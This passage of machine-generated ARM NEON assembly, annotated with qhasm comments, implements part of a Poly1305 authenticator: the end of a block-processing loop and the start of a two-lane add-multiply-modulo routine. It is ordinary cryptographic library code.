# asm 1: vrev64.i32 >r0=reg128#4,<r0=reg128#4
# asm 2: vrev64.i32 >r0=q3,<r0=q3
vrev64.i32 q3,q3
# qhasm: r4[0,1] += x4[0] unsigned* y0[0]; r4[2,3] += x4[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r4=reg128#5,<x4=reg128#11%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r4=q4,<x4=d20,<y0=d0
vmlal.u32 q4,d20,d0
# qhasm: r0[0,1] += x4[0] unsigned* 5y12[0]; r0[2,3] += x4[1] unsigned* 5y12[1]
# asm 1: vmlal.u32 <r0=reg128#4,<x4=reg128#11%bot,<5y12=reg128#12%bot
# asm 2: vmlal.u32 <r0=q3,<x4=d20,<5y12=d22
vmlal.u32 q3,d20,d22
# qhasm: r0[0,1] += x23[0] unsigned* 5y34[0]; r0[2,3] += x23[1] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r0=reg128#4,<x23=reg128#10%bot,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r0=q3,<x23=d18,<5y34=d24
vmlal.u32 q3,d18,d24
# qhasm: r0[0,1] += x23[2] unsigned* 5y12[2]; r0[2,3] += x23[3] unsigned* 5y12[3]
# asm 1: vmlal.u32 <r0=reg128#4,<x23=reg128#10%top,<5y12=reg128#12%top
# asm 2: vmlal.u32 <r0=q3,<x23=d19,<5y12=d23
vmlal.u32 q3,d19,d23
# qhasm: c01 c23 = c01[0]c23[0]c01[2]c23[2]c01[1]c23[1]c01[3]c23[3]
# asm 1: vtrn.32 <c01=reg128#8,<c23=reg128#14
# asm 2: vtrn.32 <c01=q7,<c23=q13
vtrn.32 q7,q13
# qhasm: r0[0,1] += x01[0] unsigned* y0[0]; r0[2,3] += x01[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r0=reg128#4,<x01=reg128#9%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r0=q3,<x01=d16,<y0=d0
vmlal.u32 q3,d16,d0
# qhasm: r3[0,1] = c23[2]<<18; r3[2,3] = c23[3]<<18
# asm 1: vshll.u32 >r3=reg128#6,<c23=reg128#14%top,#18
# asm 2: vshll.u32 >r3=q5,<c23=d27,#18
vshll.u32 q5,d27,#18
# qhasm: r0[0,1] += x01[2] unsigned* 5y34[2]; r0[2,3] += x01[3] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r0=reg128#4,<x01=reg128#9%top,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r0=q3,<x01=d17,<5y34=d25
vmlal.u32 q3,d17,d25
# qhasm: r3[0,1] += x01[0] unsigned* y34[0]; r3[2,3] += x01[1] unsigned* y34[1]
# asm 1: vmlal.u32 <r3=reg128#6,<x01=reg128#9%bot,<y34=reg128#3%bot
# asm 2: vmlal.u32 <r3=q5,<x01=d16,<y34=d4
vmlal.u32 q5,d16,d4
# qhasm: r3[0,1] += x01[2] unsigned* y12[2]; r3[2,3] += x01[3] unsigned* y12[3]
# asm 1: vmlal.u32 <r3=reg128#6,<x01=reg128#9%top,<y12=reg128#2%top
# asm 2: vmlal.u32 <r3=q5,<x01=d17,<y12=d3
vmlal.u32 q5,d17,d3
# qhasm: r3[0,1] += x23[0] unsigned* y12[0]; r3[2,3] += x23[1] unsigned* y12[1]
# asm 1: vmlal.u32 <r3=reg128#6,<x23=reg128#10%bot,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r3=q5,<x23=d18,<y12=d2
vmlal.u32 q5,d18,d2
# qhasm: r3[0,1] += x23[2] unsigned* y0[0]; r3[2,3] += x23[3] unsigned* y0[1]
# asm 1: vmlal.u32 <r3=reg128#6,<x23=reg128#10%top,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r3=q5,<x23=d19,<y0=d0
vmlal.u32 q5,d19,d0
# qhasm: r1[0,1] = c23[0]<<6; r1[2,3] = c23[1]<<6
# asm 1: vshll.u32 >r1=reg128#14,<c23=reg128#14%bot,#6
# asm 2: vshll.u32 >r1=q13,<c23=d26,#6
vshll.u32 q13,d26,#6
# qhasm: r3[0,1] += x4[0] unsigned* 5y34[2]; r3[2,3] += x4[1] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r3=reg128#6,<x4=reg128#11%bot,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r3=q5,<x4=d20,<5y34=d25
vmlal.u32 q5,d20,d25
# qhasm: r1[0,1] += x01[0] unsigned* y12[0]; r1[2,3] += x01[1] unsigned* y12[1]
# asm 1: vmlal.u32 <r1=reg128#14,<x01=reg128#9%bot,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r1=q13,<x01=d16,<y12=d2
vmlal.u32 q13,d16,d2
# qhasm: r1[0,1] += x01[2] unsigned* y0[0]; r1[2,3] += x01[3] unsigned* y0[1]
# asm 1: vmlal.u32 <r1=reg128#14,<x01=reg128#9%top,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r1=q13,<x01=d17,<y0=d0
vmlal.u32 q13,d17,d0
# qhasm: r1[0,1] += x23[0] unsigned* 5y34[2]; r1[2,3] += x23[1] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r1=reg128#14,<x23=reg128#10%bot,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r1=q13,<x23=d18,<5y34=d25
vmlal.u32 q13,d18,d25
# qhasm: r1[0,1] += x23[2] unsigned* 5y34[0]; r1[2,3] += x23[3] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r1=reg128#14,<x23=reg128#10%top,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r1=q13,<x23=d19,<5y34=d24
vmlal.u32 q13,d19,d24
# qhasm: r2[0,1] = c01[2]<<12; r2[2,3] = c01[3]<<12
# asm 1: vshll.u32 >r2=reg128#8,<c01=reg128#8%top,#12
# asm 2: vshll.u32 >r2=q7,<c01=d15,#12
vshll.u32 q7,d15,#12
# qhasm: r1[0,1] += x4[0] unsigned* 5y12[2]; r1[2,3] += x4[1] unsigned* 5y12[3]
# asm 1: vmlal.u32 <r1=reg128#14,<x4=reg128#11%bot,<5y12=reg128#12%top
# asm 2: vmlal.u32 <r1=q13,<x4=d20,<5y12=d23
vmlal.u32 q13,d20,d23
# qhasm: r2[0,1] += x01[0] unsigned* y12[2]; r2[2,3] += x01[1] unsigned* y12[3]
# asm 1: vmlal.u32 <r2=reg128#8,<x01=reg128#9%bot,<y12=reg128#2%top
# asm 2: vmlal.u32 <r2=q7,<x01=d16,<y12=d3
vmlal.u32 q7,d16,d3
# qhasm: r2[0,1] += x01[2] unsigned* y12[0]; r2[2,3] += x01[3] unsigned* y12[1]
# asm 1: vmlal.u32 <r2=reg128#8,<x01=reg128#9%top,<y12=reg128#2%bot
# asm 2: vmlal.u32 <r2=q7,<x01=d17,<y12=d2
vmlal.u32 q7,d17,d2
# qhasm: r2[0,1] += x23[0] unsigned* y0[0]; r2[2,3] += x23[1] unsigned* y0[1]
# asm 1: vmlal.u32 <r2=reg128#8,<x23=reg128#10%bot,<y0=reg128#1%bot
# asm 2: vmlal.u32 <r2=q7,<x23=d18,<y0=d0
vmlal.u32 q7,d18,d0
# qhasm: r2[0,1] += x23[2] unsigned* 5y34[2]; r2[2,3] += x23[3] unsigned* 5y34[3]
# asm 1: vmlal.u32 <r2=reg128#8,<x23=reg128#10%top,<5y34=reg128#13%top
# asm 2: vmlal.u32 <r2=q7,<x23=d19,<5y34=d25
vmlal.u32 q7,d19,d25
# qhasm: r2[0,1] += x4[0] unsigned* 5y34[0]; r2[2,3] += x4[1] unsigned* 5y34[1]
# asm 1: vmlal.u32 <r2=reg128#8,<x4=reg128#11%bot,<5y34=reg128#13%bot
# asm 2: vmlal.u32 <r2=q7,<x4=d20,<5y34=d24
vmlal.u32 q7,d20,d24
# qhasm: 2x t1 = r0 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#9,<r0=reg128#4,#26
# asm 2: vshr.u64 >t1=q8,<r0=q3,#26
vshr.u64 q8,q3,#26
# qhasm: r0 &= mask
# asm 1: vand >r0=reg128#4,<r0=reg128#4,<mask=reg128#7
# asm 2: vand >r0=q3,<r0=q3,<mask=q6
vand q3,q3,q6
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#9,<r1=reg128#14,<t1=reg128#9
# asm 2: vadd.i64 >r1=q8,<r1=q13,<t1=q8
vadd.i64 q8,q13,q8
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#10,<r3=reg128#6,#26
# asm 2: vshr.u64 >t4=q9,<r3=q5,#26
vshr.u64 q9,q5,#26
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#6,<r3=reg128#6,<mask=reg128#7
# asm 2: vand >r3=q5,<r3=q5,<mask=q6
vand q5,q5,q6
# qhasm: 2x r4 += t4
# asm 1: vadd.i64 >r4=reg128#5,<r4=reg128#5,<t4=reg128#10
# asm 2: vadd.i64 >r4=q4,<r4=q4,<t4=q9
vadd.i64 q4,q4,q9
# qhasm: 2x t2 = r1 unsigned>> 26
# asm 1: vshr.u64 >t2=reg128#10,<r1=reg128#9,#26
# asm 2: vshr.u64 >t2=q9,<r1=q8,#26
vshr.u64 q9,q8,#26
# qhasm: r1 &= mask
# asm 1: vand >r1=reg128#11,<r1=reg128#9,<mask=reg128#7
# asm 2: vand >r1=q10,<r1=q8,<mask=q6
vand q10,q8,q6
# qhasm: 2x t0 = r4 unsigned>> 26
# asm 1: vshr.u64 >t0=reg128#9,<r4=reg128#5,#26
# asm 2: vshr.u64 >t0=q8,<r4=q4,#26
vshr.u64 q8,q4,#26
# qhasm: 2x r2 += t2
# asm 1: vadd.i64 >r2=reg128#8,<r2=reg128#8,<t2=reg128#10
# asm 2: vadd.i64 >r2=q7,<r2=q7,<t2=q9
vadd.i64 q7,q7,q9
# qhasm: r4 &= mask
# asm 1: vand >r4=reg128#5,<r4=reg128#5,<mask=reg128#7
# asm 2: vand >r4=q4,<r4=q4,<mask=q6
vand q4,q4,q6
# qhasm: 2x r0 += t0
# asm 1: vadd.i64 >r0=reg128#4,<r0=reg128#4,<t0=reg128#9
# asm 2: vadd.i64 >r0=q3,<r0=q3,<t0=q8
vadd.i64 q3,q3,q8
# qhasm: 2x t0 <<= 2
# asm 1: vshl.i64 >t0=reg128#9,<t0=reg128#9,#2
# asm 2: vshl.i64 >t0=q8,<t0=q8,#2
vshl.i64 q8,q8,#2
# qhasm: 2x t3 = r2 unsigned>> 26
# asm 1: vshr.u64 >t3=reg128#14,<r2=reg128#8,#26
# asm 2: vshr.u64 >t3=q13,<r2=q7,#26
vshr.u64 q13,q7,#26
# qhasm: 2x r0 += t0
# asm 1: vadd.i64 >r0=reg128#4,<r0=reg128#4,<t0=reg128#9
# asm 2: vadd.i64 >r0=q3,<r0=q3,<t0=q8
vadd.i64 q3,q3,q8
# qhasm: x23 = r2 & mask
# asm 1: vand >x23=reg128#10,<r2=reg128#8,<mask=reg128#7
# asm 2: vand >x23=q9,<r2=q7,<mask=q6
vand q9,q7,q6
# qhasm: 2x r3 += t3
# asm 1: vadd.i64 >r3=reg128#6,<r3=reg128#6,<t3=reg128#14
# asm 2: vadd.i64 >r3=q5,<r3=q5,<t3=q13
vadd.i64 q5,q5,q13
# qhasm: 2x t1 = r0 unsigned>> 26
# asm 1: vshr.u64 >t1=reg128#8,<r0=reg128#4,#26
# asm 2: vshr.u64 >t1=q7,<r0=q3,#26
vshr.u64 q7,q3,#26
# qhasm: x01 = r0 & mask
# asm 1: vand >x01=reg128#9,<r0=reg128#4,<mask=reg128#7
# asm 2: vand >x01=q8,<r0=q3,<mask=q6
vand q8,q3,q6
# qhasm: 2x r1 += t1
# asm 1: vadd.i64 >r1=reg128#4,<r1=reg128#11,<t1=reg128#8
# asm 2: vadd.i64 >r1=q3,<r1=q10,<t1=q7
vadd.i64 q3,q10,q7
# qhasm: 2x t4 = r3 unsigned>> 26
# asm 1: vshr.u64 >t4=reg128#8,<r3=reg128#6,#26
# asm 2: vshr.u64 >t4=q7,<r3=q5,#26
vshr.u64 q7,q5,#26
# qhasm: r3 &= mask
# asm 1: vand >r3=reg128#6,<r3=reg128#6,<mask=reg128#7
# asm 2: vand >r3=q5,<r3=q5,<mask=q6
vand q5,q5,q6
# qhasm: 2x x4 = r4 + t4
# asm 1: vadd.i64 >x4=reg128#11,<r4=reg128#5,<t4=reg128#8
# asm 2: vadd.i64 >x4=q10,<r4=q4,<t4=q7
vadd.i64 q10,q4,q7
# qhasm: len -= 32
# asm 1: sub >len=int32#4,<len=int32#4,#32
# asm 2: sub >len=r3,<len=r3,#32
sub r3,r3,#32
# qhasm: x01 = x01[0,2,1,3]
# asm 1: vtrn.32 <x01=reg128#9%bot,<x01=reg128#9%top
# asm 2: vtrn.32 <x01=d16,<x01=d17
vtrn.32 d16,d17
# qhasm: x23 = x23[0,2,1,3]
# asm 1: vtrn.32 <x23=reg128#10%bot,<x23=reg128#10%top
# asm 2: vtrn.32 <x23=d18,<x23=d19
vtrn.32 d18,d19
# qhasm: r1 = r1[0,2,1,3]
# asm 1: vtrn.32 <r1=reg128#4%bot,<r1=reg128#4%top
# asm 2: vtrn.32 <r1=d6,<r1=d7
vtrn.32 d6,d7
# qhasm: r3 = r3[0,2,1,3]
# asm 1: vtrn.32 <r3=reg128#6%bot,<r3=reg128#6%top
# asm 2: vtrn.32 <r3=d10,<r3=d11
vtrn.32 d10,d11
# qhasm: x4 = x4[0,2,1,3]
# asm 1: vtrn.32 <x4=reg128#11%bot,<x4=reg128#11%top
# asm 2: vtrn.32 <x4=d20,<x4=d21
vtrn.32 d20,d21
# qhasm: x01 = x01[0,1] r1[0,1]
# asm 1: vext.32 <x01=reg128#9%top,<r1=reg128#4%bot,<r1=reg128#4%bot,#0
# asm 2: vext.32 <x01=d17,<r1=d6,<r1=d6,#0
vext.32 d17,d6,d6,#0
# qhasm: x23 = x23[0,1] r3[0,1]
# asm 1: vext.32 <x23=reg128#10%top,<r3=reg128#6%bot,<r3=reg128#6%bot,#0
# asm 2: vext.32 <x23=d19,<r3=d10,<r3=d10,#0
vext.32 d19,d10,d10,#0
# qhasm: unsigned>? len - 32
# asm 1: cmp <len=int32#4,#32
# asm 2: cmp <len=r3,#32
cmp r3,#32
# qhasm: goto mainloop if unsigned>
bhi ._mainloop
# qhasm: end:
._end:
# qhasm: mem128[input_0] = x01;input_0+=16
# asm 1: vst1.8 {<x01=reg128#9%bot-<x01=reg128#9%top},[<input_0=int32#1]!
# asm 2: vst1.8 {<x01=d16-<x01=d17},[<input_0=r0]!
vst1.8 {d16-d17},[r0]!
# qhasm: mem128[input_0] = x23;input_0+=16
# asm 1: vst1.8 {<x23=reg128#10%bot-<x23=reg128#10%top},[<input_0=int32#1]!
# asm 2: vst1.8 {<x23=d18-<x23=d19},[<input_0=r0]!
vst1.8 {d18-d19},[r0]!
# qhasm: mem64[input_0] = x4[0]
# asm 1: vst1.8 <x4=reg128#11%bot,[<input_0=int32#1]
# asm 2: vst1.8 <x4=d20,[<input_0=r0]
vst1.8 d20,[r0]
# qhasm: len = len
# asm 1: mov >len=int32#1,<len=int32#4
# asm 2: mov >len=r0,<len=r3
mov r0,r3
# qhasm: qpopreturn len
mov sp,r12
vpop {q4,q5,q6,q7}
bx lr
# qhasm: int32 input_0
# qhasm: int32 input_1
# qhasm: int32 input_2
# qhasm: int32 input_3
# qhasm: stack32 input_4
# qhasm: stack32 input_5
# qhasm: stack32 input_6
# qhasm: stack32 input_7
# qhasm: int32 caller_r4
# qhasm: int32 caller_r5
# qhasm: int32 caller_r6
# qhasm: int32 caller_r7
# qhasm: int32 caller_r8
# qhasm: int32 caller_r9
# qhasm: int32 caller_r10
# qhasm: int32 caller_r11
# qhasm: int32 caller_r12
# qhasm: int32 caller_r14
# qhasm: reg128 caller_q4
# qhasm: reg128 caller_q5
# qhasm: reg128 caller_q6
# qhasm: reg128 caller_q7
# qhasm: reg128 r0
# qhasm: reg128 r1
# qhasm: reg128 r2
# qhasm: reg128 r3
# qhasm: reg128 r4
# qhasm: reg128 x01
# qhasm: reg128 x23
# qhasm: reg128 x4
# qhasm: reg128 y01
# qhasm: reg128 y23
# qhasm: reg128 y4
# qhasm: reg128 _5y01
# qhasm: reg128 _5y23
# qhasm: reg128 _5y4
# qhasm: reg128 c01
# qhasm: reg128 c23
# qhasm: reg128 c4
# qhasm: reg128 t0
# qhasm: reg128 t1
# qhasm: reg128 t2
# qhasm: reg128 t3
# qhasm: reg128 t4
# qhasm: reg128 mask
# qhasm: enter crypto_onetimeauth_poly1305_neon2_addmulmod
.align 2
.global openssl_poly1305_neon2_addmulmod
.hidden openssl_poly1305_neon2_addmulmod
.type openssl_poly1305_neon2_addmulmod STT_FUNC
openssl_poly1305_neon2_addmulmod:
sub sp,sp,#0
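# openssl_poly1305_neon2_addmulmod(r, x, y, c) computes
# r = (x + c) * y mod 2^130 - 5 on two independent 130-bit lanes, all
# in radix 2^26; the _5y* values fold the reduction into the multiply
# just as in the block loops above.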
# qhasm: 2x mask = 0xffffffff
# asm 1: vmov.i64 >mask=reg128#1,#0xffffffff
# asm 2: vmov.i64 >mask=q0,#0xffffffff
vmov.i64 q0,#0xffffffff
# qhasm: y01 aligned= mem128[input_2];input_2+=16
# asm 1: vld1.8 {>y01=reg128#2%bot->y01=reg128#2%top},[<input_2=int32#3,: 128]!
# asm 2: vld1.8 {>y01=d2->y01=d3},[<input_2=r2,: 128]!
vld1.8 {d2-d3},[r2,: 128]!
# qhasm: 4x _5y01 = y01 << 2
# asm 1: vshl.i32 >_5y01=reg128#3,<y01=reg128#2,#2
# asm 2: vshl.i32 >_5y01=q2,<y01=q1,#2
vshl.i32 q2,q1,#2
# qhasm: y23 aligned= mem128[input_2];input_2+=16
# asm 1: vld1.8 {>y23=reg128#4%bot->y23=reg128#4%top},[<input_2=int32#3,: 128]!
# asm 2: vld1.8 {>y23=d6->y23=d7},[<input_2=r2,: 128]!
vld1.8 {d6-d7},[r2,: 128]!
# qhasm: 4x _5y23 = y23 << 2
# asm 1: vshl.i32 >_5y23=reg128#9,<y23=reg128#4,#2
# asm 2: vshl.i32 >_5y23=q8,<y23=q3,#2
vshl.i32 q8,q3,#2
# qhasm: y4 aligned= mem64[input_2]y4[1]
# asm 1: vld1.8 {<y4=reg128#10%bot},[<input_2=int32#3,: 64]
# asm 2: vld1.8 {<y4=d18},[<input_2=r2,: 64]
vld1.8 {d18},[r2,: 64]
# qhasm: 4x _5y4 = y4 << 2
# asm 1: vshl.i32 >_5y4=reg128#11,<y4=reg128#10,#2
# asm 2: vshl.i32 >_5y4=q10,<y4=q9,#2
vshl.i32 q10,q9,#2
# qhasm: x01 aligned= mem128[input_1];input_1+=16
# asm 1: vld1.8 {>x01=reg128#12%bot->x01=reg128#12%top},[<input_1=int32#2,: 128]!
# asm 2: vld1.8 {>x01=d22->x01=d23},[<input_1=r1,: 128]!
vld1.8 {d22-d23},[r1,: 128]!
# qhasm: 4x _5y01 += y01
# asm 1: vadd.i32 >_5y01=reg128#3,<_5y01=reg128#3,<y01=reg128#2
# asm 2: vadd.i32 >_5y01=q2,<_5y01=q2,<y01=q1
vadd.i32 q2,q2,q1
# qhasm: x23 aligned= mem128[input_1];input_1+=16
# asm 1: vld1.8 {>x23=reg128#13%bot->x23=reg128#13%top},[<input_1=int32#2,: 128]!
# asm 2: vld1.8 {>x23=d24->x23=d25},[<input_1=r1,: 128]!
vld1.8 {d24-d25},[r1,: 128]!
# qhasm: 4x _5y23 += y23
# asm 1: vadd.i32 >_5y23=reg128#9,<_5y23=reg128#9,<y23=reg128#4
# asm 2: vadd.i32 >_5y23=q8,<_5y23=q8,<y23=q3
vadd.i32 q8,q8,q3
# qhasm: 4x _5y4 += y4
# asm 1: vadd.i32 >_5y4=reg128#11,<_5y4=reg128#11,<y4=reg128#10
# asm 2: vadd.i32 >_5y4=q10,<_5y4=q10,<y4=q9
vadd.i32 q10,q10,q9
# qhasm: c01 aligned= mem128[input_3];input_3+=16
# asm 1: vld1.8 {>c01=reg128#14%bot->c01=reg128#14%top},[<input_3=int32#4,: 128]!
# asm 2: vld1.8 {>c01=d26->c01=d27},[<input_3=r3,: 128]!
vld1.8 {d26-d27},[r3,: 128]!
# qhasm: 4x x01 += c01
# asm 1: vadd.i32 >x01=reg128#12,<x01=reg128#12,<c01=reg128#14
# asm 2: vadd.i32 >x01=q11,<x01=q11,<c01=q13
vadd.i32 q11,q11,q13
# qhasm: c23 aligned= mem128[input_3];input_3+=16
# asm 1: vld1.8 {>c23=reg128#14%bot->c23=reg128#14%top},[<input_3=int32#4,: 128]!
# asm 2: vld1.8 {>c23=d26->c23=d27},[<input_3=r3,: 128]!
vld1.8 {d26-d27},[r3,: 128]!
# qhasm: 4x x23 += c23
# asm 1: vadd.i32 >x23=reg128#13,<x23=reg128#13,<c23=reg128#14
# asm 2: vadd.i32 >x23=q12,<x23=q12,<c23=q13
vadd.i32 q12,q12,q13
# qhasm: x4 aligned= mem64[input_1]x4[1]
# asm 1: vld1.8 {<x4=reg128#14%bot},[<input_1=int32#2,: 64]
# asm 2: vld1.8 {<x4=d26},[<input_1=r1,: 64]
vld1.8 {d26},[r1,: 64]
# qhasm: 2x mask unsigned>>=6
# asm 1: vshr.u64 >mask=reg128#1,<mask=reg128#1,#6
# asm 2: vshr.u64 >mask=q0,<mask=q0,#6
vshr.u64 q0,q0,#6
# qhasm: c4 aligned= mem64[input_3]c4[1]
# asm 1: vld1.8 {<c4=reg128#15%bot},[<input_3=int32#4,: 64]
# asm 2: vld1.8 {<c4=d28},[<input_3=r3,: 64]
vld1.8 {d28},[r3,: 64]
# qhasm: 4x x4 += c4
# asm 1: vadd.i32 >x4=reg128#14,<x4=reg128#14,<c4=reg128#15
# asm 2: vadd.i32 >x4=q13,<x4=q13,<c4=q14
vadd.i32 q13,q13,q14
# qhasm: r0[0,1] = x01[0] unsigned* y01[0]; r0[2,3] = x01[1] unsigned* y01[1]
# asm 1: vmull.u32 >r0=reg128#15,<x01=reg128#12%bot,<y01=reg128#2%bot
# asm 2: vmull.u32 >r0=q14,<x01=d22,<y01=d2
vmull.u32 q14,d22,d2
# qhasm: r0[0,1] += x01[2] unsigned* _5y4[0]; r0[2,3] += x01[3] unsigned* _5y4[1]
# asm 1: vmlal.u32 <r0=reg128#15,<x01=reg128#12%top,<_5y4=reg128#11%bot
# asm 2: vmlal.u32 <r0=q14,<x01=d23,<_5y4=d20
vmlal.u32 q14,d23,d20
# qhasm: r0[0,1] += x23[0] unsigned* _5y23[2]; r0[2,3] += x23[1] unsigned* _5y23[3]
# asm 1: vmlal.u32 <r0=reg128#15,<x23=reg128#13%bot,<_5y23=reg128#9%top
# asm 2: vmlal.u32 <r0=q14,<x23=d24,<_5y23=d17
vmlal.u32 q14,d24,d17
# qhasm: r0[0,1] += x23[2] unsigned* _5y23[0]; r0[2,3] += x23[3] unsigned* _5y23[1]
# asm 1: vmlal.u32 <r0=reg128#15,<x23=reg128#13%top,<_5y23=reg128#9%bot
# asm 2: vmlal.u32 <r0=q14,<x23=d25,<_5y23=d16
vmlal.u32 q14,d25,d16
# qhasm: r0[0,1] += x4[0] unsigned* _5y01[2]; r0[2,3] += x4[1] unsigned* _5y01[3]
# asm 1: vmlal.u32 <r0=reg128#15,<x4=reg128#14%bot,<_5y01=reg128#3%top
# asm 2: vmlal.u32 <r0=q14,<x4=d26,<_5y01=d5
vmlal.u32 q14,d26,d5
# qhasm: r1[0,1] = x01[0] unsigned* y01[2]; r1[2,3] = x01[1] unsigned* y01[3]
# asm 1: vmull.u32 >r1=reg128#3,<x01=reg128#12%bot,<y01=reg128#2%top
# asm 2: vmull.u32 >r1=q2,<x01=d22,<y01=d3
vmull.u32 q2,d22,d3
# qhasm: r1[0,1] += x01[2] unsigned* y01[0]; r1[2,3] += x01[3] unsigned* y01[1]
# asm 1: vmlal.u32 <r1=reg128#3,<x01=reg128#12%top,<y01=reg128#2%bot
# asm 2: vmlal.u32 <r1=q2,<x01=d23,<y01=d2
vmlal.u32 q2,d23,d2
# qhasm: r1[0,1] += x23[0] unsigned* _5y4[0]; r1[2,3] += x23[1] unsigned* _5y4[1]
# asm 1: vmlal.u32 <r1=reg128#3,<x23=reg128#13%bot,<_5y4=reg128#11%bot
# asm 2: vmlal.u32 <r1=q2,<x23=d24,<_5y4=d20
vmlal.u32 q2,d24,d20
# qhasm: r1[0,1] += x23[2] unsigned* _5y23[2]; r1[2,3] += x23[3] unsigned* _5y23[3]
# asm 1: vmlal.u32 <r1=reg128#3,<x23=reg128#13%top,<_5y23=reg128#9%top
# asm 2: vmlal.u32 <r1=q2,<x23=d25,<_5y23=d17
vmlal.u32 q2,d25,d17
# qhasm: r1[0,1] += x4[0] unsigned* _5y23[0]; r1[2,3] += x4[1] unsigned* _5y23[1]
# asm 1: vmlal.u32 <r1=reg128#3,<x4=reg128#14%bot,<_5y23=reg128#9%bot
# asm 2: vmlal.u32 <r1=q2,<x4=d26,<_5y23=d16
vmlal.u32 q2,d26,d16
# qhasm: r2[0,1] = x01[0] unsigned* y23[0]; r2[2,3] = x01[1] unsigned* y23[1]
# asm 1: vmull.u32 >r2=reg128#16,<x01=reg128#12%bot,<y23=reg128#4%bot
# asm 2: vmull.u32 >r2=q15,<x01=d22,<y23=d6
vmull.u32 q15,d22,d6
# qhasm: r2[0,1] += x01[2] unsigned* y01[2]; r2[2,3] += x01[3] unsigned* y01[3]
# asm 1: vmlal.u32 <r2=reg128#16,<x01=reg128#12%top,<y01=reg128#2%top
# asm 2: vmlal.u32 <r2=q15,<x01=d23,<y01=d3
vmlal.u32 q15,d23,d3
# qhasm: r2[0,1] += x23[0] unsigned* y01[0]; r2[2,3] += x23[1] unsigned* y01[1]
# asm 1: vmlal.u32 <r2=reg128#16,<x23=reg128#13%bot,<y01=reg128#2%bot
# asm 2: vmlal.u32 <r2=q15,<x23=d24,<y01=d2
vmlal.u32 q15,d24,d2
# qhasm: r2[0,1] += x23[2] unsigned* _5y4[0]; r2[2,3] += x23[3] unsigned* _5y4[1]
# asm 1: vmlal.u32 <r2=reg128#16,<x23=reg128#13%top,<_5y4=reg128#11%bot
# asm 2: vmlal.u32 <r2=q15,<x23=d25,<_5y4=d20
vmlal.u32 q15,d25,d20
# qhasm: r2[0,1] += x4[0] unsigned* _5y23[2]; r2[2,3] += x4[1] unsigned* _5y23[3]
# asm 1: vmlal.u32 <r2=reg128#16,<x4=reg128#14%bot,<_5y23=reg128#9%top
# asm 2: vmlal.u32 <r2=q15,<x4=d26,<_5y23=d17
vmlal.u32 q15,d26,d17
# qhasm: r3[0,1] = x01[0] unsigned* y23[2]; r3[2,3] = x01[1] unsigned* y23[3]
# asm 1: vmull.u32 >r3=reg128#9,<x01=reg128#12%bot,<y23=reg128#4%top
# asm 2: vmull.u32 >r3=q8,<x01=d22,<y23=d7
vmull.u32 q8,d22,d7
# qhasm: r3[0,1] += x01[2] unsigned* y23[0]; r3[2,3] += x01[3] unsigned* y23[1]
# asm 1: vmlal.u32 <r3=reg128#9,<x01=reg128#12%top,<y23=reg128#4%bot
# asm 2: vmlal.u32 <r3=q8,<x01=d23,<y23=d6
vmlal.u32 q8,d23,d6
# qhasm: r3[0,1] += x23[0] unsigned* y01[2]; r3[2,3] += x23[1] unsigned* y01[3]
# asm 1: vmlal.u32 <r3=reg128#9,<x23=reg128#13%bot,<y01=reg128#2%top
# asm 2: vmlal.u32 <r3=q8,<x23=d24,<y01=d3
vmlal.u32 q8,d24,d3
# qhasm: r3[0,1] += x23[2] unsigned* y01[0]; r3[2,3] += x23[3] unsigned* y01[1]
# asm 1: vmlal.u32 <r3=reg128#9,<x23=reg128#13%top,<y01=reg128#2%bot
# asm 2: vmlal.u32 <r3=q8,<x23=d25,<y01=d2
vmlal.u32 q8,d25,d2
# qhasm: r3[0,1] += x4[0] unsigned* _5y4[0]; r3[2,3] += x4[1] unsigned* _5y4[1]
# asm 1: vmlal.u32 <r3=reg128#9,<x4=reg128#14%bot,<_5y4=reg128#11%bot
# asm 2: vmlal.u32 <r3=q8,<x4=d26,<_5y4=d20
vmlal.u32 q8,d26,d20
# qhasm: r4[0,1] = x01[0] unsigned* y4[0]; r4[2,3] = x01[1] unsigned* y4[1]
# asm 1: vmull.u32 >r4=reg128#10,<x01=reg128#12%bot,<y4=reg128#10%bot
# asm 2: vmull.u32 >r4=q9,<x01=d22,<y4=d18
vmull.u32 q9,d22,d18
# qhasm: r4[0,1] += x01[2] unsigned* y23[2]; r4[2,3] += x01[3] unsigned* y23[3]
# asm 1: vmlal.u32 <r4=reg128#10,<x01=reg128#12%top,<y23=reg128#4%top
# asm 2: vmlal.u32 <r4=q9,<x01=d23,<y23=d7
vmlal.u32 q9,d23,d7
# qhasm: r4[0,1] += x23[0] unsigned* y23[0]; r4[2,3] += x23[1] unsigned* y23[1]
# asm 1: vmlal.u32 <r4=reg128#10,<x23=reg128#13%bot,<y23=reg128#4%bot
# asm 2: vmlal.u32 <r4=q9,<x23=d24,<y23=d6
vmlal.u32 q9,d24,d6
# qhasm: r4[0,1] += x23[2] unsigned* y01[2]; r4[2,3] += x23[3] unsigned* y01[3]
# asm 1: vmlal.u32 <r4=reg128#10,<x23=reg128#13%top,<y01=reg128#2%top
# asm 2: vmlal.u32 <r4=q9,<x23=d25,<y01=d3
vmlal.u32 q9,d25,d3
# qhasm: r4[0,1] += x4[0] unsigned* y01[0]; r4[2,3] += x4[1] unsigned* y01[1]
# asm 1: vmlal.u32 <r4=reg128#10,<x4=reg128#14%bot,<y01=reg128#2%bot
# asm 2: vmlal.u32 <r4=q9,<x4=d26,<y01=d2
vmlal.u32 q9,d26,d2
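# Note: the vshr/vand/vadd sequence below is the usual carry propagation
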